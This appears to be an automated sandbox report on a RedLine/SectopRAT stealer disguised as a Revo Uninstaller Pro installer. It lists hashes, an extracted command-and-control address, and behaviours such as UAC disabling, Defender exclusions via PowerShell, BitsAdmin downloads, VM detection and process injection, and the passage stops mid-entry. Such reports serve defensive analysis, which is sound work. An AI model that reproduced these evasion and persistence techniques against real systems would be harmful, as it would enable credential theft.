Analysis
-
max time kernel
144s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23/10/2024, 19:26
Static task
static1
Behavioral task
behavioral1
Sample
7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe
Resource
win10v2004-20241007-en
General
-
Target
7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe
-
Size
18.6MB
-
MD5
7076117f0c6d84ffd59192a4b1e7208f
-
SHA1
08b793fc796ea5ef45f5a0d3ca989d2a2852a279
-
SHA256
621d9de231168a4edd7b0d2bfb27f24165a1996c7a540e51fa31317a506a6518
-
SHA512
b4f30483d16a6a38afedb91bba320e051be8a0ea94ed0e23c33f4fe0828d0ff08d8a0663aea6b2c5945b9649605217722037d2d214c3167d99fc90310160ff9a
-
SSDEEP
393216:bsPcjinkzVPjpLnWsDkCSDCe0nz5QVIGKXTpchSpMtm9LZ0+ecQwX:bgFn0DLnC0zuuGKjpch4++em
Malware Config
Extracted
redline
Main
146.0.75.231:65371
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral2/memory/2376-676-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
SectopRAT payload 1 IoCs
resource yara_rule behavioral2/memory/2376-676-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions afcdpsrv.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2024 powershell.exe 828 powershell.exe 2236 powershell.exe 2380 powershell.exe 2448 powershell.exe 4404 powershell.exe 1692 powershell.exe 936 powershell.exe 1328 powershell.exe 1232 powershell.exe 2164 powershell.exe 3584 powershell.exe 700 powershell.exe 2804 powershell.exe 2000 powershell.exe 3544 powershell.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 2788 bitsadmin.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\DRIVERS\revoflt.sys rundll32.exe File opened for modification C:\Windows\system32\DRIVERS\SET142F.tmp rundll32.exe File created C:\Windows\system32\DRIVERS\SET142F.tmp rundll32.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools afcdpsrv.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 3000 netsh.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion afcdpsrv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion afcdpsrv.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation ruplp.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 12 IoCs
pid Process 2392 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 3000 Revo Uninstaller Pro 4.2.3.exe 4992 Revo Uninstaller Pro 4.2.3.tmp 956 ruplp.exe 676 RevoUninPro.exe 1676 RevoUninPro.exe 1360 ruplp.exe 1472 7z.exe 2692 7z.exe 1232 7z.exe 3980 afcdpsrv.exe 2376 afcdpsrv.exe -
Loads dropped DLL 9 IoCs
pid Process 2392 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 4992 Revo Uninstaller Pro 4.2.3.tmp 4992 Revo Uninstaller Pro 4.2.3.tmp 4992 Revo Uninstaller Pro 4.2.3.tmp 4992 Revo Uninstaller Pro 4.2.3.tmp 3912 regsvr32.exe 1472 7z.exe 2692 7z.exe 1232 7z.exe -
Modifies system executable filetype association 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" regsvr32.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" rundll32.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 25 raw.githubusercontent.com 26 raw.githubusercontent.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum afcdpsrv.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 afcdpsrv.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3980 set thread context of 2376 3980 afcdpsrv.exe 153 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-ME2FI.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-EI3CR.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-5HRCU.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-9ORVD.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-32SVV.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-30L77.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-8G2P9.tmp Revo Uninstaller Pro 4.2.3.tmp File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe Revo Uninstaller Pro 4.2.3.tmp File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-IKFBN.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-SI0OP.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-KPT8D.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-6TDPQ.tmp Revo Uninstaller Pro 4.2.3.tmp File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-4N675.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-8JCNQ.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-U5MS7.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-Q88D5.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-HMGGP.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-4P81A.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-2FRP9.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-2QUFV.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-JSAF0.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-MF942.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-00PLL.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-SMB2E.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-FKF9U.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-C9VR7.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-OD1BN.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1GQI5.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-42TA1.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-RE4RK.tmp Revo Uninstaller Pro 4.2.3.tmp File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\unins000.dat Revo Uninstaller Pro 4.2.3.tmp File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-0QFS7.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-AHCCK.tmp Revo Uninstaller Pro 4.2.3.tmp File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exe Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1GRF2.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-LJIPA.tmp Revo Uninstaller Pro 4.2.3.tmp File opened for modification C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-BSA88.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-51BJP.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-M7BHF.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-HL71V.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-MC4EQ.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\unins000.dat Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-QQ7MG.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-VRQUV.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-6KA6H.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-ITRI5.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-HV5UQ.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-DG531.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-2PGBP.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-OL7V2.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-21DAI.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-P5AN3.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-E34T8.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-291BL.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-CSJ2S.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-A833Q.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-612VD.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-A3TNJ.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-FVH8B.tmp Revo Uninstaller Pro 4.2.3.tmp File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-FQC11.tmp Revo Uninstaller Pro 4.2.3.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 34 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Revo Uninstaller Pro 4.2.3.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language afcdpsrv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Revo Uninstaller Pro 4.2.3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mode.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ruplp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ruplp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language afcdpsrv.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 runonce.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz runonce.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3232 timeout.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\RevoUninstallerPro.ruel\shell\open\command Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open Revo Uninstaller Pro 4.2.3.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open\command\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe /implog \"%1\"" Revo Uninstaller Pro 4.2.3.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\ = "RUShellExt Class" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ProxyStubClsid32 ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib\Version = "5.1" ruplp.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\DefaultIcon Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell\Open\command Revo Uninstaller Pro 4.2.3.tmp Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ShellFolder\Attributes = "48" Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\FLAGS ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ProxyStubClsid32 ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ = "ILicProtectorEXE510" ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ = "Revo Uninstaller Pro" Revo Uninstaller Pro 4.2.3.tmp Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\{305CA226-D286-468e-B848-2B2E8E697B74} 2 = "8" Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ShellFolder Revo Uninstaller Pro 4.2.3.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510\ = "LicProtector Object" ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ProgID ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\Version\ = "5.1" ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Msi.Package\shellex\ContextMenuHandlers\RUShellExt regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F} ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\HELPDIR ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ProgID\ = "LicProtector.LicProtectorEXE510" ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\Version ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Msi.Package\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib\ = "{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}" ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ = "LicProtector Object" ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\LocalServer32 ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\TypeLib\ = "{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}" ruplp.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272} Revo Uninstaller Pro 4.2.3.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\DefaultIcon\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe,0" Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\DefaultIcon Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510\Clsid\ = "{DD72B942-27D2-4A3C-9353-FA0441FBABA0}" ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell\Open\command\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe" Revo Uninstaller Pro 4.2.3.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\DefaultIcon\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe,0" Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\InprocServer32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4} ruplp.exe Key created \REGISTRY\MACHINE\Software\Classes\RevoUninstallerPro.ruel\shell\open\command Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open\command Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{1D928D64-60D3-4FAC-B810-C4D9D8A680CF} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\RUExt.DLL regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\InprocServer32\ThreadingModel = "Apartment" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib\Version = "5.1" ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510\Clsid ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\TypeLib ruplp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\InfoTip = "Uninstall, Remove Programs, Clear Web Browsers Tracks, Control Automatically Started Applications" Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272} Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell Revo Uninstaller Pro 4.2.3.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ = "ILicProtectorEXE510" ruplp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4} ruplp.exe Set value (str) 